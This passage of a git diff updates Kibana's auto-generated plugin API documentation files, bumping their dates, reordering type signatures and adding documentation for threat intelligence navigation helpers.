b/api_docs/saved_objects_management.mdx index f5dacafad1ec1..9af762e3cfda2 100644 --- a/api_docs/saved_objects_management.mdx +++ b/api_docs/saved_objects_management.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/savedObjectsManagement title: "savedObjectsManagement" image: https://source.unsplash.com/400x175/?github description: API docs for the savedObjectsManagement plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'savedObjectsManagement'] --- import savedObjectsManagementObj from './saved_objects_management.devdocs.json'; diff --git a/api_docs/saved_objects_tagging.devdocs.json b/api_docs/saved_objects_tagging.devdocs.json index 2cc307c5a8bb8..0ed05dcb1409e 100644 --- a/api_docs/saved_objects_tagging.devdocs.json +++ b/api_docs/saved_objects_tagging.devdocs.json @@ -1173,7 +1173,7 @@ "label": "errors", "description": [], "signature": [ - "{ color?: string | undefined; id?: string | undefined; name?: string | undefined; description?: string | undefined; }" + "{ color?: string | undefined; id?: string | undefined; description?: string | undefined; name?: string | undefined; }" ], "path": "x-pack/plugins/saved_objects_tagging/common/validation.ts", "deprecated": false diff --git a/api_docs/saved_objects_tagging.mdx b/api_docs/saved_objects_tagging.mdx index 8e04730b5ae12..97b5caa86734b 100644 --- a/api_docs/saved_objects_tagging.mdx +++ b/api_docs/saved_objects_tagging.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/savedObjectsTagging title: "savedObjectsTagging" image: https://source.unsplash.com/400x175/?github description: API docs for the savedObjectsTagging plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'savedObjectsTagging'] --- import savedObjectsTaggingObj from './saved_objects_tagging.devdocs.json'; diff --git a/api_docs/saved_objects_tagging_oss.mdx b/api_docs/saved_objects_tagging_oss.mdx index 9e9f58f1f35ac..99a6a16692913 100644 --- a/api_docs/saved_objects_tagging_oss.mdx +++ b/api_docs/saved_objects_tagging_oss.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/savedObjectsTaggingOss title: "savedObjectsTaggingOss" image: https://source.unsplash.com/400x175/?github description: API docs for the savedObjectsTaggingOss plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'savedObjectsTaggingOss'] --- import savedObjectsTaggingOssObj from './saved_objects_tagging_oss.devdocs.json'; diff --git a/api_docs/saved_search.mdx b/api_docs/saved_search.mdx index 909dcde427f6e..b68e01356a8f1 100644 --- a/api_docs/saved_search.mdx +++ b/api_docs/saved_search.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/savedSearch title: "savedSearch" image: https://source.unsplash.com/400x175/?github description: API docs for the savedSearch plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'savedSearch'] --- import savedSearchObj from './saved_search.devdocs.json'; diff --git a/api_docs/screenshot_mode.mdx b/api_docs/screenshot_mode.mdx index a6ce61befa1c9..13c646152f5f5 100644 --- a/api_docs/screenshot_mode.mdx +++ b/api_docs/screenshot_mode.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/screenshotMode title: "screenshotMode" image: https://source.unsplash.com/400x175/?github description: API docs for the screenshotMode plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'screenshotMode'] --- import screenshotModeObj from './screenshot_mode.devdocs.json'; diff --git a/api_docs/screenshotting.mdx b/api_docs/screenshotting.mdx index 12c44e2938c05..bbc09d7885d48 100644 --- a/api_docs/screenshotting.mdx +++ b/api_docs/screenshotting.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/screenshotting title: "screenshotting" image: https://source.unsplash.com/400x175/?github description: API docs for the screenshotting plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'screenshotting'] --- import screenshottingObj from './screenshotting.devdocs.json'; diff --git a/api_docs/security.mdx b/api_docs/security.mdx index 3b57fa603d456..70bfc2aaadf3c 100644 --- a/api_docs/security.mdx +++ b/api_docs/security.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/security title: "security" image: https://source.unsplash.com/400x175/?github description: API docs for the security plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'security'] --- import securityObj from './security.devdocs.json'; diff --git a/api_docs/security_solution.mdx b/api_docs/security_solution.mdx index f8802061c5df8..6c7bbf1b7b79a 100644 --- a/api_docs/security_solution.mdx +++ b/api_docs/security_solution.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/securitySolution title: "securitySolution" image: https://source.unsplash.com/400x175/?github description: API docs for the securitySolution plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'securitySolution'] --- import securitySolutionObj from './security_solution.devdocs.json'; diff --git a/api_docs/session_view.mdx b/api_docs/session_view.mdx index dfff2e52fd8e8..3763185a95fcf 100644 --- a/api_docs/session_view.mdx +++ b/api_docs/session_view.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/sessionView title: "sessionView" image: https://source.unsplash.com/400x175/?github description: API docs for the sessionView plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'sessionView'] --- import sessionViewObj from './session_view.devdocs.json'; diff --git a/api_docs/share.mdx b/api_docs/share.mdx index 110eb4d80a626..a71f9aae70c57 100644 --- a/api_docs/share.mdx +++ b/api_docs/share.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/share title: "share" image: https://source.unsplash.com/400x175/?github description: API docs for the share plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'share'] --- import shareObj from './share.devdocs.json'; diff --git a/api_docs/shared_u_x.mdx b/api_docs/shared_u_x.mdx index 1c385a74472d6..ad5791ed00674 100644 --- a/api_docs/shared_u_x.mdx +++ b/api_docs/shared_u_x.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/sharedUX title: "sharedUX" image: https://source.unsplash.com/400x175/?github description: API docs for the sharedUX plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'sharedUX'] --- import sharedUXObj from './shared_u_x.devdocs.json'; diff --git a/api_docs/snapshot_restore.mdx b/api_docs/snapshot_restore.mdx index d956e6d9835a0..670740f05c60d 100644 --- a/api_docs/snapshot_restore.mdx +++ b/api_docs/snapshot_restore.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/snapshotRestore title: "snapshotRestore" image: https://source.unsplash.com/400x175/?github description: API docs for the snapshotRestore plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'snapshotRestore'] --- import snapshotRestoreObj from './snapshot_restore.devdocs.json'; diff --git a/api_docs/spaces.devdocs.json b/api_docs/spaces.devdocs.json index b9471fcdf12a3..16599343be1d9 100644 --- a/api_docs/spaces.devdocs.json +++ b/api_docs/spaces.devdocs.json @@ -1706,7 +1706,7 @@ "The size of the avatar." ], "signature": [ - "\"s\" | \"m\" | \"l\" | \"xl\" | undefined" + "\"m\" | \"s\" | \"l\" | \"xl\" | undefined" ], "path": "x-pack/plugins/spaces/public/space_avatar/types.ts", "deprecated": false diff --git a/api_docs/spaces.mdx b/api_docs/spaces.mdx index 4cbc8a22b2150..62952da669590 100644 --- a/api_docs/spaces.mdx +++ b/api_docs/spaces.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/spaces title: "spaces" image: https://source.unsplash.com/400x175/?github description: API docs for the spaces plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'spaces'] --- import spacesObj from './spaces.devdocs.json'; diff --git a/api_docs/stack_alerts.mdx b/api_docs/stack_alerts.mdx index 0320e317e77f0..ab426457b895b 100644 --- a/api_docs/stack_alerts.mdx +++ b/api_docs/stack_alerts.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/stackAlerts title: "stackAlerts" image: https://source.unsplash.com/400x175/?github description: API docs for the stackAlerts plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'stackAlerts'] --- import stackAlertsObj from './stack_alerts.devdocs.json'; diff --git a/api_docs/task_manager.devdocs.json b/api_docs/task_manager.devdocs.json index 73a212331c1c6..5b232995d8816 100644 --- a/api_docs/task_manager.devdocs.json +++ b/api_docs/task_manager.devdocs.json @@ -1437,7 +1437,7 @@ "TaskScheduling", ", \"schedule\" | \"runSoon\" | \"ephemeralRunNow\" | \"ensureScheduled\" | \"bulkUpdateSchedules\" | \"bulkSchedule\"> & Pick<", "TaskStore", - ", \"aggregate\" | \"fetch\" | \"get\" | \"remove\"> & { removeIfExists: (id: string) => Promise; } & { supportsEphemeralTasks: () => boolean; }" + ", \"get\" | \"aggregate\" | \"fetch\" | \"remove\"> & { removeIfExists: (id: string) => Promise; } & { supportsEphemeralTasks: () => boolean; }" ], "path": "x-pack/plugins/task_manager/server/plugin.ts", "deprecated": false, diff --git a/api_docs/task_manager.mdx b/api_docs/task_manager.mdx index e3f379a681467..66c7ef925b61d 100644 --- a/api_docs/task_manager.mdx +++ b/api_docs/task_manager.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/taskManager title: "taskManager" image: https://source.unsplash.com/400x175/?github description: API docs for the taskManager plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'taskManager'] --- import taskManagerObj from './task_manager.devdocs.json'; diff --git a/api_docs/telemetry.mdx b/api_docs/telemetry.mdx index 31a189b693dbe..b3fae06483c12 100644 --- a/api_docs/telemetry.mdx +++ b/api_docs/telemetry.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/telemetry title: "telemetry" image: https://source.unsplash.com/400x175/?github description: API docs for the telemetry plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'telemetry'] --- import telemetryObj from './telemetry.devdocs.json'; diff --git a/api_docs/telemetry_collection_manager.devdocs.json b/api_docs/telemetry_collection_manager.devdocs.json index d1a6df2c7957b..5d4bfd39478e6 100644 --- a/api_docs/telemetry_collection_manager.devdocs.json +++ b/api_docs/telemetry_collection_manager.devdocs.json @@ -72,7 +72,61 @@ "label": "esClient", "description": [], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -140,7 +190,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", @@ -166,33 +216,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", @@ -218,33 +242,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -1204,6 +1202,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", diff --git a/api_docs/telemetry_collection_manager.mdx b/api_docs/telemetry_collection_manager.mdx index a35e2503cb77e..49752eca42ae4 100644 --- a/api_docs/telemetry_collection_manager.mdx +++ b/api_docs/telemetry_collection_manager.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/telemetryCollectionManager title: "telemetryCollectionManager" image: https://source.unsplash.com/400x175/?github description: API docs for the telemetryCollectionManager plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'telemetryCollectionManager'] --- import telemetryCollectionManagerObj from './telemetry_collection_manager.devdocs.json'; diff --git a/api_docs/telemetry_collection_xpack.mdx b/api_docs/telemetry_collection_xpack.mdx index bad2b8b8e5df3..7c92a43c73b32 100644 --- a/api_docs/telemetry_collection_xpack.mdx +++ b/api_docs/telemetry_collection_xpack.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/telemetryCollectionXpack title: "telemetryCollectionXpack" image: https://source.unsplash.com/400x175/?github description: API docs for the telemetryCollectionXpack plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'telemetryCollectionXpack'] --- import telemetryCollectionXpackObj from './telemetry_collection_xpack.devdocs.json'; diff --git a/api_docs/telemetry_management_section.mdx b/api_docs/telemetry_management_section.mdx index cbc7b76b0e1d2..4f313ef00203d 100644 --- a/api_docs/telemetry_management_section.mdx +++ b/api_docs/telemetry_management_section.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/telemetryManagementSection title: "telemetryManagementSection" image: https://source.unsplash.com/400x175/?github description: API docs for the telemetryManagementSection plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'telemetryManagementSection'] --- import telemetryManagementSectionObj from './telemetry_management_section.devdocs.json'; diff --git a/api_docs/threat_intelligence.devdocs.json b/api_docs/threat_intelligence.devdocs.json index 3b277318045fe..380afebb238bf 100644 --- a/api_docs/threat_intelligence.devdocs.json +++ b/api_docs/threat_intelligence.devdocs.json @@ -2,7 +2,135 @@ "id": "threatIntelligence", "client": { "classes": [], - "functions": [], + "functions": [ + { + "parentPluginId": "threatIntelligence", + "id": "def-public.getSecuritySolutionDeepLink", + "type": "Function", + "tags": [], + "label": "getSecuritySolutionDeepLink", + "description": [ + "\nGets the threat intelligence properties of a TI page for deep linking in the security solution." + ], + "signature": [ + "(threatIntelligencePage: \"indicators\") => TIDeepLink" + ], + "path": "x-pack/plugins/threat_intelligence/public/common/navigation/security_solution_links.ts", + "deprecated": false, + "children": [ + { + "parentPluginId": "threatIntelligence", + "id": "def-public.getSecuritySolutionDeepLink.$1", + "type": "string", + "tags": [], + "label": "threatIntelligencePage", + "description": [ + "the name of the threat intelligence page." + ], + "signature": [ + "\"indicators\"" + ], + "path": "x-pack/plugins/threat_intelligence/public/common/navigation/security_solution_links.ts", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [ + "a {@link TIDeepLink }" + ], + "initialIsOpen": false + }, + { + "parentPluginId": "threatIntelligence", + "id": "def-public.getSecuritySolutionLink", + "type": "Function", + "tags": [], + "label": "getSecuritySolutionLink", + "description": [ + "\nGets the threat intelligence properties of a TI page for navigation in the security solution." + ], + "signature": [ + "(threatIntelligencePage: \"indicators\") => TILinkItem" + ], + "path": "x-pack/plugins/threat_intelligence/public/common/navigation/security_solution_links.ts", + "deprecated": false, + "children": [ + { + "parentPluginId": "threatIntelligence", + "id": "def-public.getSecuritySolutionLink.$1", + "type": "string", + "tags": [], + "label": "threatIntelligencePage", + "description": [ + "the name of the threat intelligence page." + ], + "signature": [ + "\"indicators\"" + ], + "path": "x-pack/plugins/threat_intelligence/public/common/navigation/security_solution_links.ts", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [ + "a {@link TILinkItem }" + ], + "initialIsOpen": false + }, + { + "parentPluginId": "threatIntelligence", + "id": "def-public.getSecuritySolutionNavTab", + "type": "Function", + "tags": [], + "label": "getSecuritySolutionNavTab", + "description": [ + "\nGets the threat intelligence properties of a TI page for navigation in the old security solution navigation." + ], + "signature": [ + "(threatIntelligencePage: \"indicators\", basePath: string) => TINavTab" + ], + "path": "x-pack/plugins/threat_intelligence/public/common/navigation/security_solution_links.ts", + "deprecated": false, + "children": [ + { + "parentPluginId": "threatIntelligence", + "id": "def-public.getSecuritySolutionNavTab.$1", + "type": "string", + "tags": [], + "label": "threatIntelligencePage", + "description": [ + "the name of the threat intelligence page." + ], + "signature": [ + "\"indicators\"" + ], + "path": "x-pack/plugins/threat_intelligence/public/common/navigation/security_solution_links.ts", + "deprecated": false, + "isRequired": true + }, + { + "parentPluginId": "threatIntelligence", + "id": "def-public.getSecuritySolutionNavTab.$2", + "type": "string", + "tags": [], + "label": "basePath", + "description": [ + "the base path for links." + ], + "signature": [ + "string" + ], + "path": "x-pack/plugins/threat_intelligence/public/common/navigation/security_solution_links.ts", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [ + "a {@link TINavTab }" + ], + "initialIsOpen": false + } + ], "interfaces": [ { "parentPluginId": "threatIntelligence", @@ -58,7 +186,9 @@ "type": "Interface", "tags": [], "label": "ThreatIntelligenceSecuritySolutionContext", - "description": [], + "description": [ + "\nMethods exposed from the security solution to the threat intelligence application." + ], "path": "x-pack/plugins/threat_intelligence/public/types.ts", "deprecated": false, "children": [ @@ -68,7 +198,9 @@ "type": "Function", "tags": [], "label": "getFiltersGlobalComponent", - "description": [], + "description": [ + "\nGets the `FiltersGlobal` component for embedding a filter bar in the security solution application." + ], "signature": [ "() => React.ComponentType<{ children: React.ReactNode; }>" ], @@ -83,7 +215,9 @@ "type": "Object", "tags": [], "label": "licenseService", - "description": [], + "description": [ + "\nGet the user's license to drive the Threat Intelligence plugin's visibility." + ], "signature": [ "LicenseAware" ], @@ -95,7 +229,40 @@ } ], "enums": [], - "misc": [], + "misc": [ + { + "parentPluginId": "threatIntelligence", + "id": "def-public.THREAT_INTELLIGENCE_BASE_PATH", + "type": "string", + "tags": [], + "label": "THREAT_INTELLIGENCE_BASE_PATH", + "description": [ + "\nBase path for all the pages within the Threat Intelligence plugin." + ], + "signature": [ + "\"/threat_intelligence\"" + ], + "path": "x-pack/plugins/threat_intelligence/public/common/navigation/constants.ts", + "deprecated": false, + "initialIsOpen": false + }, + { + "parentPluginId": "threatIntelligence", + "id": "def-public.TIPageId", + "type": "Type", + "tags": [], + "label": "TIPageId", + "description": [ + "\nAll the IDs for the threat intelligence pages.\nThis needs to match the threat intelligence page entries in SecurityPageName` (x-pack/plugins/security_solution/common/constants.ts).\n\nExample to add more IDs:\n export type TIPageId = 'threat_intelligence-indicators' | 'threat_intelligence-feed';" + ], + "signature": [ + "\"threat_intelligence-indicators\"" + ], + "path": "x-pack/plugins/threat_intelligence/public/common/navigation/types.ts", + "deprecated": false, + "initialIsOpen": false + } + ], "objects": [] }, "server": { diff --git a/api_docs/threat_intelligence.mdx b/api_docs/threat_intelligence.mdx index 7ff74034992bd..9e2202a97d276 100644 --- a/api_docs/threat_intelligence.mdx +++ b/api_docs/threat_intelligence.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/threatIntelligence title: "threatIntelligence" image: https://source.unsplash.com/400x175/?github description: API docs for the threatIntelligence plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'threatIntelligence'] --- import threatIntelligenceObj from './threat_intelligence.devdocs.json'; @@ -21,10 +21,16 @@ Contact [Protections Experience Team](https://github.com/orgs/elastic/teams/prot | Public API count | Any count | Items lacking comments | Missing exports | |-------------------|-----------|------------------------|-----------------| -| 6 | 0 | 6 | 1 | +| 15 | 0 | 3 | 1 | ## Client +### Functions + + ### Interfaces +### Consts, variables and types + + diff --git a/api_docs/timelines.devdocs.json b/api_docs/timelines.devdocs.json index 041b50c3f880d..8172c6d16cbe6 100644 --- a/api_docs/timelines.devdocs.json +++ b/api_docs/timelines.devdocs.json @@ -772,7 +772,7 @@ "EuiDataGridColumn", ", \"id\" | \"display\" | \"displayAsText\" | \"initialWidth\"> & Pick<", "EuiDataGridColumn", - ", \"id\" | \"display\" | \"schema\" | \"actions\" | \"defaultSortDirection\" | \"displayAsText\" | \"initialWidth\" | \"isSortable\"> & { aggregatable?: boolean | undefined; tGridCellActions?: ", + ", \"id\" | \"schema\" | \"actions\" | \"display\" | \"defaultSortDirection\" | \"displayAsText\" | \"initialWidth\" | \"isSortable\"> & { aggregatable?: boolean | undefined; tGridCellActions?: ", "TGridCellAction", "[] | undefined; category?: string | undefined; columnHeaderType: ", { @@ -804,7 +804,7 @@ "EuiDataGridColumn", ", \"id\" | \"display\" | \"displayAsText\" | \"initialWidth\"> & Pick<", "EuiDataGridColumn", - ", \"id\" | \"display\" | \"schema\" | \"actions\" | \"defaultSortDirection\" | \"displayAsText\" | \"initialWidth\" | \"isSortable\"> & { aggregatable?: boolean | undefined; tGridCellActions?: ", + ", \"id\" | \"schema\" | \"actions\" | \"display\" | \"defaultSortDirection\" | \"displayAsText\" | \"initialWidth\" | \"isSortable\"> & { aggregatable?: boolean | undefined; tGridCellActions?: ", "TGridCellAction", "[] | undefined; category?: string | undefined; columnHeaderType: ", { @@ -2302,7 +2302,7 @@ "EuiDataGridColumn", ", \"id\" | \"display\" | \"displayAsText\" | \"initialWidth\"> & Pick<", "EuiDataGridColumn", - ", \"id\" | \"display\" | \"schema\" | \"actions\" | \"defaultSortDirection\" | \"displayAsText\" | \"initialWidth\" | \"isSortable\"> & { aggregatable?: boolean | undefined; tGridCellActions?: ", + ", \"id\" | \"schema\" | \"actions\" | \"display\" | \"defaultSortDirection\" | \"displayAsText\" | \"initialWidth\" | \"isSortable\"> & { aggregatable?: boolean | undefined; tGridCellActions?: ", "TGridCellAction", "[] | undefined; category?: string | undefined; columnHeaderType: ", { @@ -2849,11 +2849,11 @@ "label": "TGridModelForTimeline", "description": [], "signature": [ - "{ id: string; version: string | null; title: string; columns: (Pick<", + "{ columns: (Pick<", "EuiDataGridColumn", ", \"id\" | \"display\" | \"displayAsText\" | \"initialWidth\"> & Pick<", "EuiDataGridColumn", - ", \"id\" | \"display\" | \"schema\" | \"actions\" | \"defaultSortDirection\" | \"displayAsText\" | \"initialWidth\" | \"isSortable\"> & { aggregatable?: boolean | undefined; tGridCellActions?: ", + ", \"id\" | \"schema\" | \"actions\" | \"display\" | \"defaultSortDirection\" | \"displayAsText\" | \"initialWidth\" | \"isSortable\"> & { aggregatable?: boolean | undefined; tGridCellActions?: ", "TGridCellAction", "[] | undefined; category?: string | undefined; columnHeaderType: ", { @@ -2865,11 +2865,11 @@ }, "; description?: string | null | undefined; esTypes?: string[] | undefined; example?: string | number | null | undefined; format?: string | undefined; linkField?: string | undefined; placeholder?: string | undefined; subType?: ", "IFieldSubType", - " | undefined; type?: string | undefined; })[]; filters?: ", + " | undefined; type?: string | undefined; })[]; title: string; id: string; filters?: ", "Filter", "[] | undefined; dataViewId: string | null; sort: ", "SortColumnTimeline", - "[]; filterManager?: ", + "[]; version: string | null; filterManager?: ", { "pluginId": "data", "scope": "public", @@ -2881,7 +2881,7 @@ "EuiDataGridColumn", ", \"id\" | \"display\" | \"displayAsText\" | \"initialWidth\"> & Pick<", "EuiDataGridColumn", - ", \"id\" | \"display\" | \"schema\" | \"actions\" | \"defaultSortDirection\" | \"displayAsText\" | \"initialWidth\" | \"isSortable\"> & { aggregatable?: boolean | undefined; tGridCellActions?: ", + ", \"id\" | \"schema\" | \"actions\" | \"display\" | \"defaultSortDirection\" | \"displayAsText\" | \"initialWidth\" | \"isSortable\"> & { aggregatable?: boolean | undefined; tGridCellActions?: ", "TGridCellAction", "[] | undefined; category?: string | undefined; columnHeaderType: ", { @@ -3981,7 +3981,7 @@ "signature": [ "Pick<", "EuiDataGridColumn", - ", \"id\" | \"display\" | \"schema\" | \"actions\" | \"defaultSortDirection\" | \"displayAsText\" | \"initialWidth\" | \"isSortable\"> & { aggregatable?: boolean | undefined; tGridCellActions?: ", + ", \"id\" | \"schema\" | \"actions\" | \"display\" | \"defaultSortDirection\" | \"displayAsText\" | \"initialWidth\" | \"isSortable\"> & { aggregatable?: boolean | undefined; tGridCellActions?: ", "TGridCellAction", "[] | undefined; category?: string | undefined; columnHeaderType: ", { @@ -6542,7 +6542,7 @@ "signature": [ "Pick<", "EuiDataGridColumn", - ", \"id\" | \"display\" | \"schema\" | \"actions\" | \"defaultSortDirection\" | \"displayAsText\" | \"initialWidth\" | \"isSortable\"> & { aggregatable?: boolean | undefined; tGridCellActions?: ", + ", \"id\" | \"schema\" | \"actions\" | \"display\" | \"defaultSortDirection\" | \"displayAsText\" | \"initialWidth\" | \"isSortable\"> & { aggregatable?: boolean | undefined; tGridCellActions?: ", "TGridCellAction", "[] | undefined; category?: string | undefined; columnHeaderType: ", { @@ -6950,7 +6950,7 @@ "label": "TimelineKpiStrategyRequest", "description": [], "signature": [ - "{ id?: string | undefined; params?: ", + "{ params?: ", { "pluginId": "data", "scope": "common", @@ -6958,7 +6958,7 @@ "section": "def-common.ISearchRequestParams", "text": "ISearchRequestParams" }, - " | undefined; timerange: ", + " | undefined; id?: string | undefined; timerange: ", { "pluginId": "timelines", "scope": "common", diff --git a/api_docs/timelines.mdx b/api_docs/timelines.mdx index 484ea88ef8f94..5a8657bacff3c 100644 --- a/api_docs/timelines.mdx +++ b/api_docs/timelines.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/timelines title: "timelines" image: https://source.unsplash.com/400x175/?github description: API docs for the timelines plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'timelines'] --- import timelinesObj from './timelines.devdocs.json'; diff --git a/api_docs/transform.mdx b/api_docs/transform.mdx index ebc0f26bbc7af..e9be02b930e5a 100644 --- a/api_docs/transform.mdx +++ b/api_docs/transform.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/transform title: "transform" image: https://source.unsplash.com/400x175/?github description: API docs for the transform plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'transform'] --- import transformObj from './transform.devdocs.json'; diff --git a/api_docs/triggers_actions_ui.devdocs.json 